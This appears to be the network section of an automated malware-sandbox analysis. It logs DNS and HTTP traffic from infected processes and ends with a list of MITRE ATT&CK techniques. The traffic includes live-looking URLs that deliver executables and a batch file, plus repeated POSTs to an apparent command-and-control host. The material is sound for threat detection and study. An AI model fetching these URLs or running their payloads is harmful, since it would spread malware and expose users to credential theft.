Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tey%2FIc0dtSVl4qg3VClPSNFHj65m4ncW7OLTIDLb7vRE201tHw7e%2BOyDjOp5elRPOQg3WbDknUihxB%2BOtHNQQ3bELw2W20A6XQunufRMzZIVlMe%2B8JK9KouoC%2FWEpjaf8w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814988ccbf790b73-AMS
DNS

www.dropbox.com

Remote address:

8.8.8.8:53

Request

www.dropbox.com

IN A

Response

www.dropbox.com

IN CNAME

www-env.dropbox-dns.com

www-env.dropbox-dns.com

IN A

162.125.8.18
GET

https://www.dropbox.com/scl/fi/ooxede6dbp3m16b7h6890/Run.exe?rlkey=b45sdlyibhsdkvy53dnzajfof&dl=1

Explorer.EXE

Remote address:

162.125.8.18:443

Request

GET /scl/fi/ooxede6dbp3m16b7h6890/Run.exe?rlkey=b45sdlyibhsdkvy53dnzajfof&dl=1 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: www.dropbox.com

Response

HTTP/1.1 409 Conflict

Content-Security-Policy: script-src 'none'
Content-Security-Policy: sandbox
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: gvc=MzMwNzAxNDA1MzU5OTUzODEwNjg1MjY5Mjc0MzY0MjY1MDAwMjA0; Path=/; Expires=Mon, 09 Oct 2028 19:33:21 GMT; HttpOnly; Secure; SameSite=None
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow, noimageindex
X-Xss-Protection: 1; mode=block
Content-Type: text/html; charset=utf-8
Content-Length: 1121
Date: Wed, 11 Oct 2023 19:33:21 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
Server: envoy
Cache-Control: no-cache, no-store
Vary: Accept-Encoding
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: c669e32689aa41e8a6519da20681cc63
GET

https://www.dropbox.com/scl/fi/gg8zfy94fcoifxga6t0hs/pew.EXE?rlkey=78zqk5k7bkps0zw8uzqxkvcfi&dl=1

Explorer.EXE

Remote address:

162.125.8.18:443

Request

GET /scl/fi/gg8zfy94fcoifxga6t0hs/pew.EXE?rlkey=78zqk5k7bkps0zw8uzqxkvcfi&dl=1 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: www.dropbox.com

Response

HTTP/1.1 409 Conflict

Content-Security-Policy: script-src 'none'
Content-Security-Policy: sandbox
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: gvc=Mjg5NzYwMDM0ODUyMTg5MzU1NjcxODM3NTg5MjM3MDE1MDAwNjYy; Path=/; Expires=Mon, 09 Oct 2028 19:33:22 GMT; HttpOnly; Secure; SameSite=None
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow, noimageindex
X-Xss-Protection: 1; mode=block
Content-Type: text/html; charset=utf-8
Content-Length: 1121
Date: Wed, 11 Oct 2023 19:33:22 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
Server: envoy
Cache-Control: no-cache, no-store
Vary: Accept-Encoding
X-Dropbox-Response-Origin: far_remote
X-Dropbox-Request-Id: 8c943f2fc3e44a7a814179301fac9763
DNS

88.69.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.69.67.172.in-addr.arpa

IN PTR

Response
DNS

129.8.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

129.8.26.104.in-addr.arpa

IN PTR

Response
DNS

18.8.125.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.8.125.162.in-addr.arpa

IN PTR

Response
GET

https://shorturl.at/nvLX2

Explorer.EXE

Remote address:

172.67.69.88:443

Request

GET /nvLX2 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: shorturl.at

Response

HTTP/1.1 301 Moved Permanently

Date: Wed, 11 Oct 2023 19:33:22 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
location: https://www.shorturl.at/nvLX2
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-nginx-upstream-cache-status: MISS
x-server-powered-by: Engintron
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ktydhpuH9Q76CyLv%2FL06Ds7dwitjt7zJSY7Ey3aC6iUXJ1hk6FWqqW9jnSziHpTB5Pb7K8fFqHyEhWqUBbTJ%2FOusi87fCqFpaslkmCXa7GolSEy%2FtXOjoYJp7len"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 814988cbecef0e89-AMS
POST

http://servermlogs27.xyz/statweb255/

explorer.exe

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://servermlogs27.xyz/statweb255/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 533
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:33:23 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
POST

http://servermlogs27.xyz/statweb255/

explorer.exe

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://servermlogs27.xyz/statweb255/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 79
Host: servermlogs27.xyz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 11 Oct 2023 19:33:36 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
DNS

rl.ammyy.com

svchost.exe

Remote address:

8.8.8.8:53

Request

rl.ammyy.com

IN A

Response

rl.ammyy.com

IN A

188.42.129.148
POST

http://rl.ammyy.com/

svchost.exe

Remote address:

188.42.129.148:80

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: rl.ammyy.com
Content-Length: 247
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 11 Oct 2023 19:33:40 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Content-Length: 248
Content-Type: text/html
POST

http://servermlogs27.xyz/statweb255/

svchost.exe

Remote address:

45.131.66.120:80

Request

POST /statweb255/ HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://servermlogs27.xyz/statweb255/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 105
Host: servermlogs27.xyz

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 11 Oct 2023 19:33:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
DNS

226.162.46.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

226.162.46.104.in-addr.arpa

IN PTR

Response
DNS

148.129.42.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

148.129.42.188.in-addr.arpa

IN PTR

Response
DNS

242.104.243.136.in-addr.arpa

Remote address:

8.8.8.8:53

Request

242.104.243.136.in-addr.arpa

IN PTR

Response

242.104.243.136.in-addr.arpa

IN PTR

static242104243136clientsyour-serverde
DNS

www.ammyy.com

svchost.exe

Remote address:

8.8.8.8:53

Request

www.ammyy.com

IN A

Response

www.ammyy.com

IN A

136.243.18.118
GET

http://www.ammyy.com/files/v8/aans64y2.gz

svchost.exe

Remote address:

136.243.18.118:80

Request

GET /files/v8/aans64y2.gz HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Range: bytes=0-
Accept-Encoding: gzip, deflate
Host: www.ammyy.com
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Date: Wed, 11 Oct 2023 19:33:42 GMT
Server: Apache/2.4.6 (CentOS)
Location: https://www.ammyy.com/files/v8/aans64y2.gz
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1
GET

https://www.ammyy.com/files/v8/aans64y2.gz

svchost.exe

Remote address:

136.243.18.118:443

Request

GET /files/v8/aans64y2.gz HTTP/1.1
Range: bytes=0-
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Host: www.ammyy.com
Connection: Keep-Alive

Response

HTTP/1.1 206 Partial Content

Date: Wed, 11 Oct 2023 19:33:43 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 05 Dec 2021 20:54:18 GMT
ETag: "509a4-5d26c580371d1"
Accept-Ranges: bytes
Content-Length: 330148
Content-Range: bytes 0-330147/330148
Connection: close
Content-Type: application/x-gzip
DNS

118.18.243.136.in-addr.arpa

Remote address:

8.8.8.8:53

Request

118.18.243.136.in-addr.arpa

IN PTR

Response

118.18.243.136.in-addr.arpa

IN PTR

static11818243136clientsyour-serverde
DNS

147.174.42.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.174.42.23.in-addr.arpa

IN PTR

Response

147.174.42.23.in-addr.arpa

IN PTR

a23-42-174-147deploystaticakamaitechnologiescom
DNS

9.175.53.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.175.53.84.in-addr.arpa

IN PTR

Response

9.175.53.84.in-addr.arpa

IN PTR

a84-53-175-9deploystaticakamaitechnologiescom

45.131.66.61:80

http://amxt25.xyz/a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd

http

b5b467e9309cbddb4a9ed34a82a36163.exe

41.4kB
1.8MB
760
1311

HTTP Request

GET http://amxt25.xyz/a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd

HTTP Response

200
45.131.66.61:80

http://amxt25.xyz/a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd

http

certreq.exe

4.9kB
1.9kB
16
17

HTTP Request

GET http://amxt25.xyz/a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd

HTTP Response

101
45.131.66.61:80

http://amxt25.xyz/a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd

http

certreq.exe

16.3kB
808.3kB
337
649

HTTP Request

GET http://amxt25.xyz/a6ba5b1ae6dec5f7c/8tkf22v9.ed2jd

HTTP Response

101
45.131.66.120:80

http://servermlogs27.xyz/statweb255/

http

Explorer.EXE

16.7kB
471.2kB
204
363

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

200

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

200

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

200

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

200

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

200

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404
45.131.66.222:80

http://xemtex534.xyz/777/skxKIGw.exe

http

Explorer.EXE

18.7kB
937.4kB
370
677

HTTP Request

GET http://xemtex534.xyz/777/mtxsYHJ.exe

HTTP Response

200

HTTP Request

GET http://xemtex534.xyz/777/skxKIGw.exe

HTTP Response

200
108.181.20.35:443

https://files.catbox.moe/k1glod.bat

tls, http

Explorer.EXE

250.2kB
13.6MB
5226
9798

HTTP Request

GET https://files.catbox.moe/k1glod.bat

HTTP Response

200
172.67.69.88:443

https://shorturl.at/moPSY

tls, http

Explorer.EXE

856 B
6.9kB
9
11

HTTP Request

GET https://shorturl.at/moPSY

HTTP Response

301
104.26.8.129:443

https://www.shorturl.at/nvLX2

tls, http

Explorer.EXE

1.1kB
7.5kB
11
11

HTTP Request

GET https://www.shorturl.at/moPSY

HTTP Response

302

HTTP Request

GET https://www.shorturl.at/nvLX2

HTTP Response

302
162.125.8.18:443

https://www.dropbox.com/scl/fi/gg8zfy94fcoifxga6t0hs/pew.EXE?rlkey=78zqk5k7bkps0zw8uzqxkvcfi&dl=1

tls, http

Explorer.EXE

1.2kB
8.0kB
9
13

HTTP Request

GET https://www.dropbox.com/scl/fi/ooxede6dbp3m16b7h6890/Run.exe?rlkey=b45sdlyibhsdkvy53dnzajfof&dl=1

HTTP Response

409

HTTP Request

GET https://www.dropbox.com/scl/fi/gg8zfy94fcoifxga6t0hs/pew.EXE?rlkey=78zqk5k7bkps0zw8uzqxkvcfi&dl=1

HTTP Response

409
172.67.69.88:443

https://shorturl.at/nvLX2

tls, http

Explorer.EXE

902 B
6.8kB
10
11

HTTP Request

GET https://shorturl.at/nvLX2

HTTP Response

301
45.131.66.120:80

http://servermlogs27.xyz/statweb255/

http

explorer.exe

1.1kB
715 B
6
4

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404
45.131.66.120:80

http://servermlogs27.xyz/statweb255/

http

explorer.exe

8.0kB
444.9kB
165
322

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

200
188.42.129.148:80

http://rl.ammyy.com/

http

svchost.exe

611 B
564 B
5
4

HTTP Request

POST http://rl.ammyy.com/

HTTP Response

200
136.243.104.242:443

https

svchost.exe

220 B
134 B
4
3
45.131.66.120:80

http://servermlogs27.xyz/statweb255/

http

svchost.exe

669 B
715 B
5
4

HTTP Request

POST http://servermlogs27.xyz/statweb255/

HTTP Response

404
136.243.18.118:80

http://www.ammyy.com/files/v8/aans64y2.gz

http

svchost.exe

458 B
781 B
6
5

HTTP Request

GET http://www.ammyy.com/files/v8/aans64y2.gz

HTTP Response

301
136.243.18.118:443

https://www.ammyy.com/files/v8/aans64y2.gz

tls, http

svchost.exe

12.3kB
345.9kB
256
253

HTTP Request

GET https://www.ammyy.com/files/v8/aans64y2.gz

HTTP Response

206

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

2.136.104.51.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.136.104.51.in-addr.arpa
8.8.8.8:53

126.23.238.8.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

126.23.238.8.in-addr.arpa
8.8.8.8:53

136.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

136.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

amxt25.xyz

dns

certreq.exe

56 B
72 B
1
1

DNS Request

amxt25.xyz

DNS Response

45.131.66.61
8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

61.66.131.45.in-addr.arpa

dns

142 B
130 B
2
1

DNS Request

61.66.131.45.in-addr.arpa

DNS Request

61.66.131.45.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

126.22.238.8.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

126.22.238.8.in-addr.arpa
8.8.8.8:53

servermlogs27.xyz

dns

svchost.exe

63 B
79 B
1
1

DNS Request

servermlogs27.xyz

DNS Response

45.131.66.120
8.8.8.8:53

xemtex534.xyz

dns

59 B
75 B
1
1

DNS Request

xemtex534.xyz

DNS Response

45.131.66.222
8.8.8.8:53

120.66.131.45.in-addr.arpa

dns

72 B
131 B
1
1

DNS Request

120.66.131.45.in-addr.arpa
8.8.8.8:53

222.66.131.45.in-addr.arpa

dns

72 B
131 B
1
1

DNS Request

222.66.131.45.in-addr.arpa
8.8.8.8:53

files.catbox.moe

dns

62 B
78 B
1
1

DNS Request

files.catbox.moe

DNS Response

108.181.20.35
8.8.8.8:53

35.20.181.108.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

35.20.181.108.in-addr.arpa
8.8.8.8:53

shorturl.at

dns

57 B
105 B
1
1

DNS Request

shorturl.at

DNS Response

172.67.69.88

104.26.9.129

104.26.8.129
8.8.8.8:53

www.shorturl.at

dns

61 B
109 B
1
1

DNS Request

www.shorturl.at

DNS Response

104.26.8.129

104.26.9.129

172.67.69.88
8.8.8.8:53

www.dropbox.com

dns

61 B
111 B
1
1

DNS Request

www.dropbox.com

DNS Response

162.125.8.18
8.8.8.8:53

88.69.67.172.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

88.69.67.172.in-addr.arpa
8.8.8.8:53

129.8.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

129.8.26.104.in-addr.arpa
8.8.8.8:53

18.8.125.162.in-addr.arpa

dns

71 B
121 B
1
1

DNS Request

18.8.125.162.in-addr.arpa
8.8.8.8:53

rl.ammyy.com

dns

svchost.exe

58 B
74 B
1
1

DNS Request

rl.ammyy.com

DNS Response

188.42.129.148
8.8.8.8:53

226.162.46.104.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

226.162.46.104.in-addr.arpa
8.8.8.8:53

148.129.42.188.in-addr.arpa

dns

73 B
146 B
1
1

DNS Request

148.129.42.188.in-addr.arpa
8.8.8.8:53

242.104.243.136.in-addr.arpa

dns

74 B
133 B
1
1

DNS Request

242.104.243.136.in-addr.arpa
8.8.8.8:53

www.ammyy.com

dns

svchost.exe

59 B
75 B
1
1

DNS Request

www.ammyy.com

DNS Response

136.243.18.118
8.8.8.8:53

118.18.243.136.in-addr.arpa

dns

73 B
131 B
1
1

DNS Request

118.18.243.136.in-addr.arpa
8.8.8.8:53

147.174.42.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

147.174.42.23.in-addr.arpa
8.8.8.8:53

9.175.53.84.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

9.175.53.84.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Inhibit System Recovery